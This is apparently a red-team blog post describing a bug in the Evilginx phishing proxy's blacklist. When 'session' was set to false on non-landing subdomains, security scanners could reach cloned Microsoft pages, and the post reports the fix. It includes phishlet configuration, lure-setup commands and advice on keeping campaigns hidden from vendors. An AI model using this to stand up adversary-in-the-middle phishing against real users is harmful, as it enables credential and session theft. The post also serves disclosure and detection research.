Introduction
Earlier this week, Spotit’s detection engineering team reached out to our red team with the request to set up a basic Evilginx server to test new detection strategies against modern Adversary-in-the-Middle (AitM) attacks, in order to better protect Spotit and its customers.
Having set up this type of infrastructure countless times during red team engagements, we expected this to be an easy task. However, things took an interesting turn when our infrastructure got detected by several security vendors within minutes of spinning up the Evilginx server. What made this particularly interesting is that these vendors managed to detect the Evilginx infrastructure even though the built-in blacklist feature was in use and no “Lure URL” had been sent over email.
Further investigation of how this was possible led us to discover a significant issue within Evilginx, one that may already have caused countless Evilginx servers relying on the built-in blacklist functionality to be unknowingly detected this way. We shared these findings with Kuba Gretzky (the creator of Evilginx), who quickly released an emergency fix to address the issue.
Evilginx Setup
Our detection engineering team was specifically interested in detecting Adversary-in-the-Middle attacks against our own Microsoft login page using CSS-based Canary Tokens (more on that later). To properly test this, the red team assisted by setting up a simulated phishing site targeting the Microsoft login page with Evilginx.
Since Microsoft is a common target for these kinds of attacks, dozens of readily available phishlet configurations can be found online, so we will not focus on the config too much here and only zoom in on the relevant part: the proxy_hosts section.
In this example, we intercept the traffic of the following three domains:
- login.microsoftonline.com
- www.office.com
- aadcdn.msftauth.net
Since we were only setting up Evilginx for the detection engineering team and not for a real phishing campaign, the phishing subdomains to which these domains would be mapped did not need to be anything fancy and were simply set to test, test1 and test2 respectively. For this blog, let’s say these subdomains were hosted on the malicious.com domain.
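For reference, the relevant proxy_hosts section of such a phishlet looks roughly like the sketch below. The values are illustrative (malicious.com is the placeholder domain used throughout this post), but the fields follow the standard Evilginx phishlet format, and the session values shown here are the ones that end up mattering later in this story.

```yaml
proxy_hosts:
  # Landing page: the cloned Microsoft sign-in page
  - {phish_sub: 'test', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true, auto_filter: true}
  # Cloned www.office.com, proxied but not used to capture credentials or cookies
  - {phish_sub: 'test1', orig_sub: 'www', domain: 'office.com', session: false, is_landing: false, auto_filter: true}
  # CDN serving static assets for the login page
  - {phish_sub: 'test2', orig_sub: 'aadcdn', domain: 'msftauth.net', session: false, is_landing: false, auto_filter: true}
```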
To prevent security vendors’ scanners from accessing the phishing site, Evilginx comes with a built-in blacklist feature that can be configured to redirect unwanted visitors to a different location.
In fact, the default blacklist setting redirects any “unauthorized” visitor to the configured unauth_url. A visitor is considered unauthorized if they do not reach the website through a specific “Lure URL” created in Evilginx. Every Lure URL contains a random ID which allows Evilginx to distinguish between an actual victim we want to target and an automated scanner checking whether the website is malicious.
In this case, Evilginx was configured to redirect any unauthorized visitors (who are trying to access the website without a valid Lure URL) to the Spotit company website.
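In the Evilginx console, that setup boils down to a handful of commands along these lines. The phishlet name (microsoft365) and the redirect URL are placeholders, and the exact command syntax may differ slightly between Evilginx versions:

```
: config unauth_url https://legitimate-company-website.example/
: blacklist unauth
: phishlets hostname microsoft365 malicious.com
: phishlets enable microsoft365
: lures create microsoft365
: lures get-url 0
```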
At this point, we were ready to enable the Evilginx server.
Detection
Assuming the blacklist feature would redirect all scanners to the Spotit website, we figured we could now safely expose the website to the internet without having to worry about most basic scanners detecting our infrastructure.
However, without even sharing a valid lure URL with our detection team, one of the subdomains was already blocked by Google Safe Browsing within minutes after making it accessible to the internet.
How was that possible?
We initially thought they might have been fingerprinting Evilginx directly through static indicators that can be observed before the blacklist redirect takes place. This is certainly possible, as Evilginx is known to have several static indicators (such as the specific JavaScript it uses to redirect unauthorized visitors, its TLS fingerprints (e.g. JA3S), and so on).
That would not explain, however, why only one of the three phishing subdomains (test1.malicious.com) was detected and blocked.
In fact, the main phishing landing page (test.malicious.com) was still undetected.
- login.microsoftonline.com → test.malicious.com
- www.office.com → test1.malicious.com
- aadcdn.msftauth.net → test2.malicious.com
This shows that something had to be different between the two, causing the cloned www.office.com website to be detected while the cloned login.microsoftonline.com was not.
After some time, we received a takedown request from Netcraft’s automatic Takedown Service. Netcraft works together with hosting providers and domain registrars to inform the owners of domains when they detect suspicious content on their websites.
As part of this notice, Netcraft shares a report containing automatically created screenshots as evidence of why they believe the website is hosting malicious content.
To our surprise, these screenshots showed the actual Microsoft Office website that was cloned on the test1.malicious.com subdomain.
How were they able to access the actual cloned website? Shouldn’t the Evilginx blacklist have redirected the scanner to the Spotit website? Furthermore, Evilginx did not show any entries in its logs about a scanner accessing the test1 subdomain (even with blacklist logging enabled).
The only way they should have been able to access the cloned website is if they had somehow gotten hold of a valid Lure URL, which would temporarily whitelist their IP address. But that was impossible, as we had not sent the lure URL over any medium through which a security vendor could have obtained it.
Additionally, the detection timestamp was so close to the initial setup of Evilginx that it rather points towards the subdomain being automatically scanned after appearing in Certificate Transparency logs when the SSL certificate was requested.
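Certificate Transparency logs are public, so anyone (security vendors included) can watch for newly issued certificates and immediately probe the hostnames they contain. For example, all subdomains that received a certificate for our placeholder domain could be pulled from the public crt.sh service with something like:

```
curl -s 'https://crt.sh/?q=%25.malicious.com&output=json' | jq -r '.[].name_value' | sort -u
```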
So did this scanner really find a bypass for the Evilginx blacklist, or are we giving it too much credit?
Unraveling
At this point we clearly needed to do some more testing in order to investigate how this was possible.
We tried accessing the landing page from a non-whitelisted IP address that had never visited the lure URL. As expected, this returned a redirect to the unauth_url and added our IP address to the blacklist.
So far so good. Let’s now try the same for the test1 subdomain after clearing the blacklist and restarting Evilginx.
Surprisingly, we did not get blacklisted this time and were able to access the cloned website just as the scanner had, without having to do anything special at all.
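Reproducing this is as simple as requesting both hosts from an IP address that has never opened a lure URL (the hostnames below are the placeholders used in this post):

```
# Landing host: we are sent to the unauth_url and our IP gets blacklisted,
# so the cloned login page never loads.
curl -sk https://test.malicious.com/

# Non-landing host with session set to false: before the fix, this simply
# returned the proxied www.office.com content; no redirect, no blacklist, no log entry.
curl -sk https://test1.malicious.com/
```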
Let’s take a step back and look at our phishlet configuration.
My first thought was that the blacklist might only work on the landing pages. However, when I asked Kuba (the creator of Evilginx) about this, he assured me that the blacklist should apply to all subdomains that are part of the phishlet.
The other main difference between the test and test1 subdomains is the session parameter.
The Evilginx documentation does not mention that this parameter has any effect on the blacklist either. It only states that the setting should be set to true if cookies or credentials need to be captured from that domain, and that it can otherwise safely be set to false.
Just for science though, let’s set the session parameter to true for the test1 subdomain and try to access it again from an unauthorized source.
Interestingly, it now correctly redirects the visitor to the unauth_url as expected. So it seems that setting the session parameter to false can unintentionally cause features such as the blacklist to break.
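For completeness, this is what the adjusted proxy_hosts entry looks like. Explicitly setting session to true on the non-landing host is what restores the expected blacklist behavior, and it doubles as a workaround for anyone not yet running a fixed Evilginx build:

```yaml
# Same entry as before, but with session explicitly enabled
- {phish_sub: 'test1', orig_sub: 'www', domain: 'office.com', session: true, is_landing: false, auto_filter: true}
```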
Impact
On its own, this issue might not seem that impactful at first. After all, by the time your phishing campaign is being investigated by the blue team, their attention will usually be drawn to the main landing page first, at which point experienced security analysts should be able to quickly identify other indicators that would lead them to the same conclusion (especially when the red team has not taken other OPSEC measures to protect their infrastructure).
However, the impact of this issue really becomes apparent when Certificate Transparency Logs are used by security vendors to instantly scan your website the moment a TLS certificate is requested for your domains. As observed previously, this can result in your domain being instantly detected as malicious and subsequently cause it to be blocked by various security vendors before even starting your phishing campaign.
Looking at popular repositories where example phishlets for commonly targeted websites are shared, it becomes clear that this issue is unknowingly affecting a lot of phishlets.
Fix
After identifying the root cause, we shared our findings with the creator of Evilginx. He independently confirmed this behavior and stated that it was an oversight he had not accounted for, but one that did indeed have a fairly significant impact.
Within two hours of this confirmation, Kuba already shared a fix to address this issue. The most important change is highlighted in the following screenshot (although some other minor tweaks were necessary to ensure that this would work).
To summarize, every phishing subdomain will now be treated as if the session parameter was set to true in its config, whereas previously this was only the case if the subdomain was explicitly configured with the session parameter or marked as a landing page with the is_landing parameter.
Kuba asked us to test whether this fixed the issue. After confirming this indeed was the case, the fix was published to GitHub and announced on Twitter.
Conclusion
If you’re using Evilginx during your assessments and rely on the built-in blacklist functionality, then you should really make sure to pull the latest Evilginx version containing the fix to protect your campaigns.
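If you run Evilginx from source, updating is a matter of pulling the latest commit from the official repository and rebuilding. A minimal sketch, assuming a standard Go toolchain is installed:

```
# Fresh checkout; use `git pull` instead if you already have a local clone
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
go build -o evilginx .
```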
However, for those of you really looking to improve your OPSEC, there are still a lot of other indicators that you need to consider. In a future blog post, we will take a deep dive into how to take your OPSEC to the next level when using Evilginx.
Oh, and those Canary Tokens? We have some tricks up our sleeves to deal with those as well. Stay tuned!